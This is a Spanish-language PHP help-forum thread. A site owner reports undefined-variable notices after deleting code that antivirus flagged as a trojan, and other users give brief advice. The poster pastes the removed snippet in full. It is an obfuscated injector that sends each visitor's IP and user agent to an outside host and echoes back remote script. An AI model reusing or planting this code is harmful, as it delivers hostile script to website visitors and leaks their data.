Foros del Web » Programando para Internet » PHP »

Error PHP

Estas en el tema de Error PHP en el foro de PHP en Foros del Web. Hola, una web que estaba funcionando sin problema ahora me salen ciertos errores que no entiendo: Notice: Undefined variable: retorno in /home/icarlosr/public_html/home.php on line 31 ...
  #1 (permalink)  
Antiguo 10/04/2015, 14:19
 
Fecha de Ingreso: mayo-2006
Ubicación: Ciudad de Buenos Aires
Mensajes: 78
Antigüedad: 18 años
Puntos: 2
Error PHP

Hola, una web que estaba funcionando sin problema ahora me salen ciertos errores que no entiendo:

Notice: Undefined variable: retorno in /home/icarlosr/public_html/home.php on line 31

Notice: Undefined variable: referer in /home/icarlosr/public_html/home.php on line 35

Notice: Undefined variable: resultado in /home/icarlosr/public_html/home.php on line 63
WARNING IsterXmlExpatNonValid->parse(): expat: XML declaration not finished [56/52/1]

Notice: Undefined variable: i in /home/icarlosr/public_html/home.php on line 287

Notice: Undefined variable: wtitulo in /home/icarlosr/public_html/home.php on line 289

Notice: Undefined variable: wprecio in /home/icarlosr/public_html/home.php on line 291

Notice: Undefined variable: tipo in /home/icarlosr/public_html/home.php on line 293

Notice: Undefined variable: wdescripcion in /home/icarlosr/public_html/home.php on line 295

Notice: Undefined variable: vid in /home/icarlosr/public_html/home.php on line 297

Notice: Undefined variable: wfoto1 in /home/icarlosr/public_html/home.php on line 299


No entiendo qué pudo haber pasado, alguien me puede dar una mano?

Aclaro algo antes: al querer descargar el archivo .php mi NOD32 me detectaba un trojan, lo descargué igual y encontré lo siguiente que hacia que fuera detectado como tal:

<?php
#42dd37#
error_reporting(0); ini_set('display_errors',0); $wp_haqbj28618 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_haqbj28618) && !preg_match ('/bot/i', $wp_haqbj28618))){
$wp_haqbj0928618="http://"."html"."-style".".com/style"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_haqbj28618);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_haqbj0928618);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_28618haqbj = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_28618haqbj,1,3) === 'scr' ){ echo $wp_28618haqbj; }
#/42dd37#
?>


Lo borré y dejó de ser detectado como virus pero me salieron los errores que menciona mas arriba.

Espero que me puedan una mano para solucionarlo, muchas gracias!
  #2 (permalink)  
Antiguo 10/04/2015, 14:33
Avatar de NueveReinas  
Fecha de Ingreso: septiembre-2013
Ubicación: No tan Buenos Aires
Mensajes: 1.101
Antigüedad: 10 años, 8 meses
Puntos: 145
Respuesta: Error PHP

En los errores te dice los errores del código. No se qué parte no se entiende...
__________________
¿Te sirvió la respuesta? Deja un +1
  #3 (permalink)  
Antiguo 10/04/2015, 15:04
Avatar de rodrypaladin
Moderador
 
Fecha de Ingreso: abril-2010
Ubicación: Madrid
Mensajes: 2.127
Antigüedad: 14 años, 1 mes
Puntos: 468
Respuesta: Error PHP

Las variables no están definidas correctamente. ¿ Qué variables ? te las dice en cada linea de cada error.
__________________
No te olvides de dar +1 a quien te echa un cable ;)
  #4 (permalink)  
Antiguo 10/04/2015, 15:48
Avatar de javiipg  
Fecha de Ingreso: febrero-2015
Ubicación: Barcelona
Mensajes: 10
Antigüedad: 9 años, 2 meses
Puntos: 1
Respuesta: Error PHP

Exacto, rodrypaladin lleva toda la razón. Revisa la recogida de los valores de esas variable, algo está fallando.
  #5 (permalink)  
Antiguo 10/04/2015, 15:49
 
Fecha de Ingreso: mayo-2006
Ubicación: Ciudad de Buenos Aires
Mensajes: 78
Antigüedad: 18 años
Puntos: 2
Respuesta: Error PHP

Muchas gracias a todos.

Etiquetas: html, variable
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 14:48.